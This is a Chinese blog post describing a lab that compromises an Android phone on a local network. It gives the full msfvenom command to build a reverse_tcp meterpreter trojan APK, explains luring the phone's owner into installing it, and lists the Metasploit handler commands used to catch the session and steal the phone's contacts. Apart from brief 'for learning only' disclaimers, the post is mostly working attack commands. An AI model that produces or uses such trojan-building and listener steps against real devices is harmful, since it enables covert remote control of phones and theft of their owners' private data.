渗透测试--使用kali入侵局域网手机实验

声明本文仅限于技术讨论与学习,严禁用于非法途径,否则后果自负。

原理:借助kali的Metasploit渗透测试框架生成远程木马,然后感染局域网内Android手机,从而实现对被渗透手机数据的读取等。

实验前准备

    kali虚拟机:192.168.0.102(攻击机)

    win10中间机:用于将kali生成的远程木马发送到Android手机中。

    Android手机:192.168.0.105(靶机)

    Xshell4:用于将在kali上生成的远程木马从kali中导到win10中间机中。

实验过程

一、kali生成远程木马

  1.利用msfvenom生成木马病毒,payload选择android/meterpreter/reverse_tcp,后接kali虚拟机的名字和端口:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk

      

 

 

  2. 检查文件的生成:

      

 

二、木马传送

  利用win10中的Xshell4将kali中生成的android.apk传送到指定路径(本实验指定路径为F:\),再诱导Android手机(靶机)安装。

  1.用Xshell4连接kali虚拟机并将android.apk传送到指定路径:

       

 

 

       

 

 

       

 

 

   2.将F盘下的android.apk诱导发送到目标靶机上安装。

    目标靶机上安装完成木马后会出现如下图标:

      

 

 

 三、目标攻击

  1.msf监听

    kali虚拟机终端依次执行以下命令:

      msfconsole        //启动msfconsole

      use exploit/multi/handler  //加载模块

      set payload android/meterpreter/reverse_tcp  //选择payload

      set LHOST 192.168.0.102

      set LPORT 8888

      exploit          //开始执行漏洞,开始监听,等待目标上线 

    

 

 

   在目标手机上点一下木马文件(没有页面),则可成功建立攻击会话:

    

 

 

   查看上述文件:

 

上述实验演示的是窃取目标靶机通讯录,如果对其他命令感兴趣的话可通过help命令自行尝试。

提醒本实验仅用于技术讨论与学习,严禁用于非法途径,否则后果自负。

 

posted @ 2020-09-30 18:50  残梅殇-古月  阅读(7339)  评论(0编辑  收藏  举报